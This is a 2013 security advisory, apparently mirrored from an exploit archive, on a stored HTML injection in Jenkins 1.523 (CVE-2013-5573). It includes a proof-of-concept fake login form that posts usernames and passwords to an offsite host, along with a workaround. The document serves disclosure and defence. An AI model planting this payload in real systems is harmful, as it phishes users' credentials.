Skip to content
cyberexploits
webappphptext

Jenkins 1.523 - Inject Persistent HTML Code

Jenkins 1.523 - Inject Persistent HTML Code

Publié le 2013-12-18

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/30408.txt7eac4c3a
raw
###################################################



01. ###  Advisory Information ###



Title: Default markup formatter permits offsite-bound forms

Date published : 2013-12-16

Date of last update: 2013-12-16

Vendors contacted : Jenkins CI v 1.523

Discovered by: Christian Catalano

Severity: Low





02. ###  Vulnerability Information ###



CVE reference: CVE-2013-5573

CVSS v2 Base Score: 4.7

CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)

Component/s : Jenkins CI v 1.523

Class : HTML Injection





03. ### Introduction ###



Jenkins CI is an extendable open source continuous integration server 

http://jenkins-ci.org.





04. ### Vulnerability Description ###



The default installation and configuration of Jenkins CI is prone to a 

security vulnerability. The Jenkins CI default markup formatter permits 

offsite-bound forms. This vulnerability could be exploited by a remote 

attacker (a malicious user) to inject malicious persistent HTML script 

code (application side).





05. ### Technical Description / Proof of Concept Code ###



The vulnerability is located in the 'Descriotion' input field of the 

User Configuration  function:



https://localhost:9444/jenkins/user/attacker/configure



To reproduce the vulnerability,  the attacker (a malicious user) can add 

the malicious HTML script code:



<form method="POST" action="http://www.mocksite.org/login/login.php.">

Username: <input type="text" name="username" size="15" /><br />

Password: <input type="password" name="passwort" size="15" /><br />

<div align="center">

<p><input type="submit" value="Login" /></p>

</div>

</form>



in the 'Descriotion' input field and click on save button.

The code execution happens when the victim (an unaware user) view the 

'People List'



https://localhost:9444/jenkins/asynchPeople/



and click on attacker user id.





06. ### Business Impact ###



Exploitation of the persistent web vulnerability requires a low 

privilege web application user account.

Successful exploitation of the vulnerability results in persistent 

phishing and persistent external redirects.





07. ### Systems Affected ###





This vulnerability was tested against:

Jenkins CI v1.523

Older versions are probably affected too, but they were not checked.





08. ### Vendor Information, Solutions and Workarounds ###



Currently, there are no known upgrades or patches to correct this 

vulnerability. It is possible to temporarily mitigate the flaw by 

implementing the following workaround:

'MyspacePolicy' permits

tag("form", "action", ONSITE_OR_OFFSITE_URL,

             "method");



Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or 

perhaps <form> could be banned entirely.





09. ### Credits ###



This vulnerability has been discovered by:

Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com





10.  ### Vulnerability History ###



August   21th, 2013: Vulnerability identification

August    4th, 2013: Vendor notification [Jenkins CI]

November 19th, 2013: Vulnerability confirmation [Jenkins CI]

November 19th, 2013: Vendor Solution

December 16th, 2013: Vulnerability disclosure



11. ### Disclaimer ###



The information contained within this advisory is supplied "as-is" with 

no warranties or guarantees of fitness of use or otherwise.

I accept no responsibility for any damage caused by the use or misuse of 

this information.



###################################################

Voir sur GitHub